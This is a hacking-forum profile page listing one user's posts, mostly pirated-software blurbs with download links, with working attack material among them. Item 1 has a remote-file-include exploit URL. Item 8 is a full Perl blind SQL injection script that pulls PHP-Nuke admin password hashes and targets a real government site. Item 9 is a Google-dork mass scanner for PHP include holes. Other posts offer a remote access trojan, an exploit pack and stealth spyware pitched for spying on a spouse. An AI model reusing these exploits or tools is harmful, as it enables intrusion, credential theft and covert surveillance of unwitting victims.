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Everything posted by Ras

  1. #vm watermark mod 0.4.1 Remote file include #Download script : [url]http://gallery.menalto.com/files/vm-watermark_mod-0.4.1.zip[/url] #Thanks to str0ke #Exploit : #[url]http://www.site.com/[/url][path]/watermark.php?GALLERY_BASEDIR=shell.txt? #Discovered by : ThE TiGeR # Miro_Tiger100[at]Hotmail[dot]com # milw0rm.com [2007-05-05]
  2. ------------------------------------------ Vulnerabilityes Scanners & Exploiters Pack ------------------------------------------ Programs: +Absinthe 1.3.1 Windows +AnonFTP Anonymous Scanner +Apache Scanner +CGI Scanner +DarkScanner 2.0 +FTP-IIS Fx Scanner +HScan 1.20 +HTTP Server Detector +ISS Internet Scanner v6.2.1 +JAAScoisX-Code RFI Code Exec Scanner +N-Stealth Security Scanner v3.7 Built 67 +RFI T00l +WebCheck +Win32 x86 RFI Vuln Scanner +X-Scan 3.3 +XSS LFI and File Discolure Scanner +Zehir Exploit Scanner THX TO: D4RK-R3V-T34M Download: http://rapidshare.com/files/29758266/vs_ep.rar
  3. In the great tradition of MagicVideoSoftware, this CD/DVD burning is a useful tool that makes it really easy to create & copy your own data, video, audio and multisession CDs, DVDs discs. Many current CD/DVD burning programs are universal “everything including the kitchen sink” applications that are overloaded with countless confusing functions. Magic Burning Studio makes life easier by concentrating on what you really want to do! Here are some key features of "Magic Burning Studio":
  4. XP Tools will erase your Internet tracks, hide your sensitive files and folders, lock your important applications, and give you the tools that you need to fine-tune your computer to your personal needs. XP Tools is a totally integrated suite of powerful PC Utilities to fix, speed up, maintain and protect your computer. With only a few minutes of tweaking, XP Tools will optimize the performance of your computer, corrects problems and helps you to customize your system to suit your needs. XP Tools will erase your Internet tracks, hide your sensitive files and folders, lock your important applications, and give you the tools that you need to fine-tune your computer to your personal needs. When you run XP Tools, your Windows system will run faster, will crash less often, and will be more private and secure. Here are some key features of "XP Tools Standard Version": Clean Disk
  5. Maintaining the optimum efficiency of your PC is not just your priority. Mindsoft Utilities XP is designed entirely for the very same purpose. With 18 high performance utilities, MindSoft provides XP users the unique opportunity to pinpoint the problems plaguing their computers and take remedial measures by themselves, along with some very well equipped help from the Mindsoft Utilities XP. Analyse and repair your hard disks. Recover so much space in your hard disk that it will look like new. Avoid failures and accelerate your PC in the same way as if you had bought more RAM memory. Use our new ActiveMemory technology to make your system more stable. MindSoft Utilities XP is aprogram that will allow you to optimize your PC. Here are some key features of "MindSoft Utilities XP":
  6. **FUNSTUFF** OpenCd CloseCD Taskbar Disable Taskbar Enable Taskbar Hide Taskbar Show OpenURL Upload file from http link Send a Message Logg Of User Restart PC Shutdown PC **Screen CAP** Take Screen Upload screen to ftp **PC INFO** Get Username Get Computername **Server egenskaper** Melt Autorun Reverse Connection **Klient egenskaper ** Msnstyle notify Minimizes to tray Stop/start listen change port Please Turn Off Anti Virus Download: http://rapidshare.com/files/29754399/Hav-Rat.rar
  7. welcome!
  8. #!/usr/bin/perl #0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0) #root_unix [url]www.unixcrew.org[/url] #Chiudere tutti i programmi che possono occupare banda #kill all the programs that can slow down the connection #Modificare la variabile HOST e divertitevi #modify the variable HOST and enjoy use strict; use warnings; use LWP; use Time::HiRes; use IO::Socket; my $host = "http://www.softwarelivre.gov.br"; my $useragent = LWP::UserAgent->new; my $metodo = HTTP::Request->new(GET => $host); my $referer; my $inizio; my $risposta; my $fine; my $tempodefault; my $tempo; my $i; my $j; my $hash; my @array; @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $referer="http://www.hackingz0ne.altervista.org"; $tempodefault=richiesta($referer); $hash=""; #QUERY RISULTANTE #INSERT INTO nuke_referer VALUES (NULL, 'http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,1,1))=102),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*') for ($i=1;$i<33;$i++) { for ($j=0;$j<16;$j++) { $referer="http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*"; $tempo=richiesta($referer); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); if($tempo>9) { $tempo=richiesta($referer); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); if($tempo>9) { $hash .=chr($array[$j]); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); $j=200; } } } if($i==1) { if($hash eq "") { $i=200; print "Attacco Fallito Sito Fixato\n"; } } } print "Attacco Terminato\n\n"; system("pause"); sub richiesta{ $referer=$_[0]; $metodo->referrer($referer); $inizio=Time::HiRes::time(); $risposta=$useragent->request($metodo); $risposta->is_success or die "$host : ",$risposta->message,"\n"; $fine=Time::HiRes::time(); $tempo=$fine-$inizio; return $tempo } sub aggiorna{ system("cls"); @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); print "Exploit Php-Nuke <=7.9 By Rossi46GO maybe other version (Ex. 8.0) Thx KingOfSka\n"; print "Visit www.Hackingz0ne.altervista.org\n\n"; print "Sito Vittima : " . $_[0] . "\n"; print "Tempo Default : " . $_[1] . " secondi\n"; print "Bruteforcing Hash : " . chr($array[$_[2]]) . "\n"; print "Bruteforcing n carattere Hash : " . $_[5] . "\n"; print "Tempo sql : " . $_[4] . " secondi\n"; print "Hash : " . $_[3] . "\n"; }
  9. #! /usr/bin/perl # ================================================================ # # google-php-include-bugs searcher v 0.8 # # (c)oded by drmist\STNC # # [url]www.security-teams.net[/url] # # # # ATTENTION. THIS SCRIPT IS PRIVATE. # # ONLY FOR STNC AND FRIENDS. NOT FOR SALE. # # # # Usage: perl script.pl --log=<log-file> --url=<test-script-url> # # Test script: # # <?php # # error_reporting(0); # # $s = md5("STNC"); # # $code = eregi("windows", php_uname())+ # # 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ # # 4*ini_get('safe_mode'); echo $s."[$code]".$s; # # ?> # # ================================================================ # use IO::Socket; @inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat", "inc", "incl", "include", "read", "write", "data", "code", "fname", "filename", "cont", "content", "menu", "open", "file", "id", "p", "f", "seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo", "corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu", "conteudo"); @zones = ("com", "net", "org", "de", "fr", "uk", "br", "am", "info", "name", "aero", "biz", "edu", "ws", "in", "cn", "us", "be", "it", "cc", "tv", "ru", "su", "jp", "kz", "se", "is", "ca", "gs", "ms", "vg", "be", "fi", "gov"); @ftypes = ("php", "php3"); $boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC"); for($i = 0; $i < @ARGV; $i++) { if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; } elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; } } if(!($script && $log)){ usage(); exit; } foreach $inc(@inc_bugs) { foreach $zone(@zones) { foreach $ftype(@ftypes) { $request = "filetype:$ftype site:$zone inurl:$inc="; print "\n[$request]\n"; $request =~ s/(.)/sprintf("%%%02x",ord($1))/eg; @dn = (); for($i = 0;$i < 10; $i++) { @temp = get("http://www.google.com/search?filter=0&num=100&start=".$i. "00&q=$request") =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi; foreach $url (@temp) { if($url !~ /($inc=[^\&]+)/i) { next; } $left = $`; $right = $'; if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; } if($url =~ /google\.com/i){ next; } ($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/; if($domain =~ /^www\.(.+)$/) { $domain = $1; } $f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;} push @dn, $domain; $print = "$left$inc=[INCLUDE]$right"; if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i) { $s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n"; $count++; print "[$count] $s"; open LOG, ">>$log"; print LOG $s; close LOG; } else { print "$print - no bugs\n"; } } } } } } sub timeout() { close $sock; } sub get() { local $request = $_[0]; local $port = 80; local $data = ""; if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/) { if($server =~ /^([^\:]+)\[0-9]{2,5})$/){ $server = $1; $port = $2; } $sock = IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM, TimeOut => $timeout ) or return 0; # connection failed print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n"; $SIG{ALRM} = \&timeout; alarm 10; while(<$sock>){ $data .= $_; } alarm 0; close $sock; } return $data; } sub usage() { print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source> Test script: <?php error_reporting(0); \$s = md5("STNC"); \$code = eregi("windows", php_uname())+ 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ 4*ini_get('safe_mode'); echo \$s."[\$code]".\$s; ?> ); }
  10. tu te-ai uitat de cand am pus topicul acela? sursa aia o aveam pe calculatorul celalalt acum ceva vreme.
  11. Antivirus The purpose of the antivirus module is to ensure detection and removal of all viruses in the wild. BitDefender Antivirus uses robust scan engines certified by ICSA Labs, Virus Bulletin, Checkmark, CheckVir and TÃœV. Proactive Detection B-HAVE (Behavioral Heuristic Analyzer in Virtual Environments) emulates a virtual computer-inside-a-computer where pieces of software are run in order to check for potential malware behavior. This BitDefender proprietary technology represents a new security layer that keeps the operating system safe from unknown viruses by detecting malicious pieces of code for which signatures have not yet been released. Permanent Antivirus Protection The new and improved BitDefender scanning engines will scan and disinfect infected files on access, minimizing data loss. Infected documents can now be recovered instead of being deleted. NEW Rootkit Detection and Removal A new BitDefender module looks for rootkits (malicious programs designed to control victim computers, while staying hidden) and removes them on detection. NEW Web Scanning Web traffic is now filtered in real-time even before reaching your browser, providing a safe and enjoyable web experience. Peer-2-Peer and IM Applications Protection Filters against viruses that spread via instant messaging and file sharing software applications. Full E-mail Protection BitDefender runs on the POP3/SMTP protocol level, filtering incoming and outgoing e-mail messages, regardless of the e-mail client used (OutlookTM, Outlook ExpressTM, The Bat!TM, Netscape
  12. Ras

    RST cs clan

    nu cred ca o sa faca nimeni clan de cs aici... pt ca toti au alte treburi si tot asa... topicu l-ati deschis aiurea ... parerea mea
  13. Ras

    FRAIER/N00B 100 %

    cein ... fara suparare tu cum erai prima oara cand ai vazut net? [poate ca tipul cu care vorbeai tu nu era pt prima oara pe net]
  14. ZoneAlarm Security Suite is an easy-to-use, comprehensive solution that provides all-in-one PC protection, integrating Zone Labs' award-winning firewall with antivirus, privacy protection, Web site filtering and instant messaging security. Here are some key features of "ZoneAlarm Security Suite":
  15. Fix Windows Registry Problems to Improve Your System's Performance Is your computer running slow? Are you experiencing computer crashes or windows error messages? Do you want to improve your system performance and stability? If you are answering yes, then you very likely need to clean up your Windows registry. Registry problems are the common cause of Windows crashes, error messages, and degraded performance! RegDoctor can safely and quickly clean and repair Windows registry problems with a few simple mouse clicks! RegDoctor uses an intelligent, high-performance detection engine to accurately identify missing and invalid references in your Windows registry. Identified registry problems are listed and rated by risk level using an easy to understand color-coded system for your information. You can choose to have RegDoctor automatically repair all identified problems, or more selectively choose which problems to repair immediately. RegDoctor also offers a Restore feature to create registry backup files, giving you the capability to safely undo any registry changes. The auto-start feature of RegDoctor helps to support its regular use. By using RegDoctor regularly to clean and repair your registry, your system should not only be more stable but it will also help Windows and your software run faster. Click here for more information on why you need software for cleaning your Windows registry. Works with Windows 95/98/ME/2000/XP/Vista. Download: http://rapidshare.com/files/29142516/RegDoctor_1.81.rar
  16. HyperCam is powerful video capture software that records AVI movies (screencam) directly from your monitor, for software presentations, software training, demos, tutorials, and fun! HyperCam supports text annotations, sound, and screen notes (great for creating automated software demos!). You can also select Frame rate and compression quality prior to video capture. HyperCam captures the action from your Windows screen and saves it to AVI (Audio-Video Interleaved) movie file. Sound from your system microphone is also recorded. Please note that HyperCam is not intended for re-recording of other video clips from the screen (e.g. playing in Media Player, RealVideo, QuickTime etc.), but rather for creating regular software presentations, tutorial, demos etc. If you still want to try it for re-recording other movie clips, please read this first. Download: http://rapidshare.com/files/29141560/Hypercam_V2.14.rar
  17. nu ai pentru ce sa iti ceri scuze am vazut ca sunt 2 descrieri ale programului, din pacate diferite asa ca am ales 1...
  18. AVETI PE ACEST SITE TUTORIALE VIDEO SI CU VOCE DESPRE: MySQL, C++, DirectX, HTML, Java si VISUAL BASIC! Vi se da tot mura in gura, nu aveti cum sa nu intelegeti.... daca nu intelegeti nu are rost sa va apucati de MySQL, C++, DirectX, HTML, Java sau VISUAL BASIC. LINK: http://sean.cruels.net/
  19. Ras

    RapGet 1.33

    RapGet (RAPidshareGET) is a downloader with code recognition for such share servers as rapidshare.de, megaupload.com, slil.ru and others. It has support for 65 free share services, multilingual support, and is free. Download: http://rapidshare.com/files/29071133/RapGet_1.33.rar
  20. DVDIdle Pro DVDIdle Pro is an unique, effective and easy-to-use DVD tweaking tool. It will extend the lifetime of DVD drive by up to 800 percent. By using Smart Read-ahead Cache technology, it saves the titles of DVD to the cache on hard drive or RAM, and lets DVD drive resting aside. Features Very easy to use: works automatically in the background Enables any region coded DVD to be played in all software DVD players Enables any CSS encrypted DVD to be copied in all DVD copy softwares Removes region code (RC) from DVD's Removes encryption (CSS) from DVD's Removes region code enhancement (RCE) from DVD's Removes analog copy protection from DVD's Removes user operation prohibitions (UOPs) from DVD's. This feature allows you to: change soundtracks on the fly. hide forced subtitles as you wish. Extends the lifetime of a DVD drive up to 800 percent Extends the lifetime of a DVD disc Extends a laptop's battery time up to 30 percent Enables the DVD menu or movie to be played directly without FBI warnings Prevents auto run of software from DVD's, such as PCFriendly Works with all DVD drives, including region-protected (RPC2) DVD drives Works "on the fly", without having to save data on the hard disk Stable and fast, it does not need any driver FREE lifetime upgrades FREE lifetime English support via e-mail, worldwide "Remove Structure Protection": copy DVD's with Sony ARccOS copy-protection! "Audio CD Free": play, copy and rip protected Audio CD's! Supports 64-bit Windows XP and Windows Server 2003 System Requirements Windows XP, 2000, ME, 98, 98SE or Windows NT4.0 SP5+ 6X-speed DVD drive or above Pentium II 500MHz or above with 64MB RAM 1MB hard drive space for installation At least 300MB free hard disk space or 128MB RAM for Smart Read-ahead Cache Supported software DVD player: PowerDVD 3.0/4.0/XP/5.0, WinDVD 2000/3.0/4.0/Platinum/5.0, ATI DVD Player, CinePlayer 4.0, Sonic CinePlayer 1.5, DirectDVD, NVDVD, Windows Media Player, PCFriendly Player, InterActual Player, TheaterTek DVD and UltraDVD Supported DVD copy software: DVDFab, DVD X Copy families, InterVideo DVD Copy 1/2, Pinnacle InstantCopy, DVD Shrink, DVD2One, CloneDVD, Roxio Disc Copier and Nero Recode Download: http://rapidshare.com/files/29070221/DVDIdle_Pro_5.9.8.5.rar
  21. imi aduc aminte... tin minte un flooder cu frunza de la marijuana... [hexat dupa sky flooder] hai bafta...
  22. Blindwrite, is a software to create a clone of your existing CD and DVD! BlindWrite extracts all the characteristics of your original CD and DVD in his own format or as a.ISO to your harddrive to reproduce a working copy of your media. It allows you to protect your investments against damage caused by children, scratches or by frequent use. Your personal CD or DVD backups can even be run directly from your computer using a virtual drive (i.e. Daemon Tools). Blindwrite's Game Copy Software supports a large number of formats and is regularly updated to support the latest technology. Combined with CopyToDVD, it is a complete set of software for all your backup needs: data files, 1:1 CD/DVD backups, audio CDs from music files and DVD movies. A must-have! BlindWrite supports all popular CD/DVD writers and handles every available DVD format (DVD-R, DVD+R, DVD-RW, DVD+RW, DVD-RAM, DVD+R Double Layer, DVD-R Dual Layer). Key Features Brand new easy to use interface featuring one-click style Supports graphic themes allowing you to customize the look and feel New reading and writing engine supporting both CDs and DVDs Works with most hardware, optimized for high quality CD/DVD writers Supports a large number of formats: BlindWrite 4.x (.BWT), CloneCD (.CCD), Iso images (.ISO), Cuesheet/Binary (.CUE/.BIN), Alcohol (.MDS) Voice notifications for program events Extended log information for easy technical support Multilingual support Download: http://rapidshare.com/files/29069285/BlindWrite_6.0.4.29.rar
  23. Win-Spy Pro 8.9.130 WinSpy is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC. WinSpy Software also includes Remote Install. WinSpy Software will capture anything the user sees or types on the keyboard. Users will be unaware of its existence. A special hotkey is used to login and access Win Spy Software. Users are unable to terminate WinSpy. Users are unable to uninstall WinSpy. Features: Monitor Chat Room (dual side) and Web Activity Monitor any Email Monitor Children’s activities on Computer / Web Monitor Employees or counter monitor employers Monitor a cheating spouse Records any password Monitors across networks Monitor by user Monitor via Webcam (record/view) Monitor via Mic (record/view) Monitor multiple remote PC Remote Deployment and Monitoring Remote FTP (upload/download) any file to remote PC Password Protected and special Hot Key for program Monitor in Total Stealth Monitor Remote PC Webcam Stealth Monitoring Key Recorder Screen Capture KeyWord Alerter Folder Hider Monitor Networks Clear Tracks Utility Archive Utility WebCam via Internet Lost PC Tracking Secure File Deletion Time on Net Report Websites Visited Reports Immune to Anti-Spyware NEW – Remote Install NEW – Remote Screen Capture NEW – Remote Keylogger NEW – Remote PC Browser NEW – Notify’s User Online NEW – Remote Sound Lis/Rec NEW – Remote Cam View/Rec NEW – Remote file launch NEW – DualSide Chat Recording NEW – Remote PC Shutdown NEW – Remote PC FTP NEW – WebCam-Motion Detect NEW – WebAccess Remote PC Download: http://rapidshare.com/files/29068305/Win-Spy_Pro_8.9.130.rar
  24. Ras

    Computer music

    da... eu credeam ca melodia e din anii '70. ramasesem chiar uimit ...
  25. http://pro-hack.ru/video/ sunt destule tutoriale video... dar pacat ca sunt in nu stiu ce limba.
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